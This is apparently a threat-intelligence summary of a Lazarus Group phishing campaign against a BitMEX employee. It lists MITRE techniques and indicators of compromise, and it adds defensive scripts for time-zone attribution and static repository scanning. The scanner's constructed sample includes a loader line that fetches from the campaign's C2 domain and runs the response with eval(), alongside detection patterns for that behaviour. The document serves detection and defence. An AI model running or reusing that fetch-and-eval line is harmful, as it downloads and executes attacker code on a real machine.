The Lazarus Group, linked to North Korea, employs a combination of unsophisticated phishing tactics and advanced post-exploitation techniques to target cryptocurrency companies. Their operational security lapses, including exposed databases and leaked IP addresses, provide key insights into their activities. #LazarusGroup #BeaverTail #Supabase
Key points
- The Lazarus Group has targeted multiple cryptocurrency platforms such as Phemex, WazirX, Bybit, and Stake using phishing as an initial infection vector.
- The group comprises multiple subgroups with varying levels of technical sophistication, from social engineering to advanced exploitation of AWS infrastructure.
- In a recent campaign the group contacted a BitMEX employee via LinkedIn and shared a private GitHub repository; the Next.js/React project in it carried code intended to deploy malware when the project was run.
- The malware communicates with command and control (C2) servers, uses obfuscated JavaScript to steal credentials, and writes collected system metadata (username, hostname, IP address, geolocation) to an attacker-controlled Supabase database.
- That Supabase database was misconfigured, exposing 37 records of infected computers and revealing operational security mistakes, including an operator connecting from a Chinese residential IP address.
- Analysis of the exposed records separated operators from victims and showed operator activity clustered in working hours consistent with the Pyongyang time zone, indicating structured daily schedules.
- Identification of multiple threat actor aliases and associated IP addresses aids in tracking and mitigating ongoing infections linked to this campaign.
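The working-hours inference in the key points above is a standard attribution step: convert the observed timestamps into a candidate local time zone and see how much activity lands inside a business day. The script below is an added example for this page, not code from the BitMEX write-up, and the timestamps it analyses are constructed, not the 37 leaked records. The 09:00 to 18:00 window and the candidate zone list are assumptions chosen for illustration.

```python
# Added example (not from the BitMEX analysis): bin operator timestamps by
# local hour in candidate time zones to test a working-hours hypothesis.
from collections import Counter
from datetime import datetime, timedelta, timezone
from zoneinfo import ZoneInfo, ZoneInfoNotFoundError

# Constructed UTC timestamps standing in for operator connection records.
SAMPLE_EVENTS = [
    "2025-05-12T00:05:00Z", "2025-05-12T01:30:00Z", "2025-05-12T02:45:00Z",
    "2025-05-12T04:10:00Z", "2025-05-12T06:00:00Z", "2025-05-12T08:20:00Z",
    "2025-05-13T00:15:00Z", "2025-05-13T03:00:00Z", "2025-05-13T07:40:00Z",
    "2025-05-13T23:50:00Z",
]

# Fallback standard offsets (hours from UTC) if the host has no tzdata.
# None of these zones observe DST, so a fixed offset is exact for them.
FIXED_OFFSETS = {"Asia/Pyongyang": 9, "Asia/Seoul": 9, "Asia/Shanghai": 8, "UTC": 0}


def tz_for(name: str):
    """Resolve an IANA zone name, falling back to a fixed offset table."""
    try:
        return ZoneInfo(name)
    except ZoneInfoNotFoundError:
        return timezone(timedelta(hours=FIXED_OFFSETS[name]))


def parse_utc(ts: str) -> datetime:
    """Parse an ISO 8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hour_histogram(events, tz_name: str) -> Counter:
    """Count events per local hour (0-23) after converting to tz_name."""
    tz = tz_for(tz_name)
    return Counter(parse_utc(ts).astimezone(tz).hour for ts in events)


def working_hours_share(events, tz_name: str, start: int = 9, end: int = 18) -> float:
    """Fraction of events whose local hour falls inside [start, end)."""
    hist = hour_histogram(events, tz_name)
    total = sum(hist.values())
    inside = sum(count for hour, count in hist.items() if start <= hour < end)
    return inside / total if total else 0.0


def rank_time_zones(events, candidates, start: int = 9, end: int = 18):
    """Rank candidate zones by how much activity lands in business hours."""
    scored = [(working_hours_share(events, tz, start, end), tz) for tz in candidates]
    return sorted(scored, reverse=True)


if __name__ == "__main__":
    for share, tz in rank_time_zones(SAMPLE_EVENTS, list(FIXED_OFFSETS)):
        print(f"{tz:16s} {share:.0%} of activity inside 09:00-18:00 local")
```

Two caveats a practitioner should carry from this: with a sample this small the UTC+8 and UTC+9 hypotheses differ by a single hour and only a few records, and Asia/Seoul scores identically to Asia/Pyongyang because both are UTC+9. The working-hours pattern corroborates other evidence (here, the exposed database and IP addresses); it does not attribute on its own.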
MITRE Techniques
- [T1566] Phishing: initial access was gained by tricking employees into running malicious code, e.g., "tricked a Safe Wallet employee into running malicious code on their computer."
- [T1176] Browser Extensions: the malware contained references to Chrome extension IDs, indicating credential theft aimed at browser extensions.
- [T1059.007] Command and Scripting Interpreter: JavaScript: obfuscated JavaScript that retrieves further scripts from C2 servers and runs them through eval() calls.
- [T1078] Valid Accounts: post-exploitation access to AWS accounts was used to modify wallet source code and facilitate theft.
- [T1098] Account Manipulation: modifications to Safe's AWS-hosted frontend code to compromise cold wallets indicate manipulation of target accounts and software.
- [T1566.003] Phishing: Spearphishing via Service: contacting victims through LinkedIn under the guise of an NFT marketplace collaboration to deliver malware.
- [T1005] Data from Local System: collection of system metadata (username, hostname, IP address, geolocation) from the infected host, written to the attacker-controlled Supabase database.
Indicators of Compromise
- [Domain] C2 and malware delivery infrastructure: regioncheck.net, fashdefi.store
- [Supabase URL] Database used for storing victim metadata: https://mkswbddldpyiqkyu.supabase.co/
- [IP Addresses] Associated with threat actor Victor@3-KZH: 223.104.144.97 (China Mobile residential IP), 107.182.231.193, 184.174.5.149, and others
- [IP Addresses] Associated with other threat actors: GHOST72@3-UJS-2 (108.181.57.127), ghost@GHOST-3 (129.232.193.253), Super@3-AHR-2 (217.138.198.34)
- [File/Repository] Malicious Next.js/React GitHub repository used to deploy malware (private repository linked via LinkedIn interaction)
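The MITRE entry for T1059.007 and the indicator list above together describe what a defender can look for before running a repository received over LinkedIn: JavaScript that fetches remote content and passes it to eval(), and any reference to the listed hosts and IP addresses. The scanner below is an added example written for this page; it is not BitMEX's tooling and the sample files it scans are constructed to resemble the described pattern, not the actual malicious repository. The rule names, the escape-count threshold and the network-call patterns are assumptions.

```python
# Added example (not from the BitMEX analysis or the malicious repository):
# static triage of a cloned Next.js/React project for eval() of fetched
# content, obfuscation markers and references to the IOCs listed above.
import re
from typing import Dict, List, Tuple

# Indicators published on this page.
IOC_HOSTS = {"regioncheck.net", "fashdefi.store", "mkswbddldpyiqkyu.supabase.co"}
IOC_IPS = {"223.104.144.97", "107.182.231.193", "184.174.5.149",
           "108.181.57.127", "129.232.193.253", "217.138.198.34"}

EVAL_RE = re.compile(r"\b(?:eval|new\s+Function)\s*\(")
NET_RE = re.compile(r"\b(?:fetch|axios(?:\.(?:get|post|request))?|https?\.(?:get|request)|XMLHttpRequest)\b")
HOST_RE = re.compile(r"(?i)\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
DECODE_RE = re.compile(r"\b(?:atob|String\.fromCharCode|Buffer\.from)\s*\(")
ESCAPE_THRESHOLD = 20  # assumed: this many escapes in one file is suspicious

# Constructed sample repository: one benign page, one loader modelled on the
# described eval-of-fetched-script pattern, one file naming the IOC Supabase host.
SAMPLE_REPO: Dict[str, str] = {
    "pages/index.js": (
        "export async function getServerSideProps() {\n"
        "  const res = await fetch('https://api.example.com/items');\n"
        "  return { props: { items: await res.json() } };\n"
        "}\n"
    ),
    "utils/regionCheck.js": (
        "const tag = String.fromCharCode(114, 101, 103);\n"
        "export async function regionCheck() {\n"
        "  const r = await fetch('https://regioncheck.net/');\n"
        "  eval(await r.text());\n"
        "}\n"
    ),
    "lib/telemetry.js": (
        "export const SUPABASE_URL = 'https://mkswbddldpyiqkyu.supabase.co/';\n"
    ),
}

Finding = Tuple[str, str, str]  # (path, rule, evidence)


def scan_source(path: str, text: str) -> List[Finding]:
    """Apply the triage rules to one source file."""
    findings: List[Finding] = []
    eval_hit = EVAL_RE.search(text)
    if eval_hit and NET_RE.search(text):
        findings.append((path, "eval_remote_content", eval_hit.group(0)))
    for host in sorted(set(HOST_RE.findall(text)) & IOC_HOSTS):
        findings.append((path, "ioc_host", host))
    for ip in sorted(set(IP_RE.findall(text)) & IOC_IPS):
        findings.append((path, "ioc_ip", ip))
    escapes = len(ESCAPE_RE.findall(text))
    decode_hit = DECODE_RE.search(text)
    if escapes >= ESCAPE_THRESHOLD:
        findings.append((path, "obfuscation", f"{escapes} hex/unicode escapes"))
    elif decode_hit and eval_hit:
        findings.append((path, "obfuscation", decode_hit.group(0)))
    return findings


def scan_repo(files: Dict[str, str]) -> List[Finding]:
    """Scan every file (path -> contents), in deterministic path order."""
    out: List[Finding] = []
    for path in sorted(files):
        out.extend(scan_source(path, files[path]))
    return out


def rules_hit(findings: List[Finding]) -> Dict[str, List[str]]:
    """Summarise findings as rule name -> list of files that triggered it."""
    summary: Dict[str, List[str]] = {}
    for path, rule, _ in findings:
        files = summary.setdefault(rule, [])
        if path not in files:
            files.append(path)
    return summary


if __name__ == "__main__":
    for path, rule, evidence in scan_repo(SAMPLE_REPO):
        print(f"{rule:20s} {path:24s} {evidence}")
```

In practice you would feed `scan_repo` the contents of the cloned checkout (including `package.json` and any postinstall scripts) before running `npm install` or `npm run dev`, since the infection described above depends on the target executing the project. Rules keyed on the published IOCs only catch this campaign's infrastructure; the eval-of-fetched-content rule is the one that generalises.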
Read more: https://blog.bitmex.com/bitmex-busts-lazarus-group/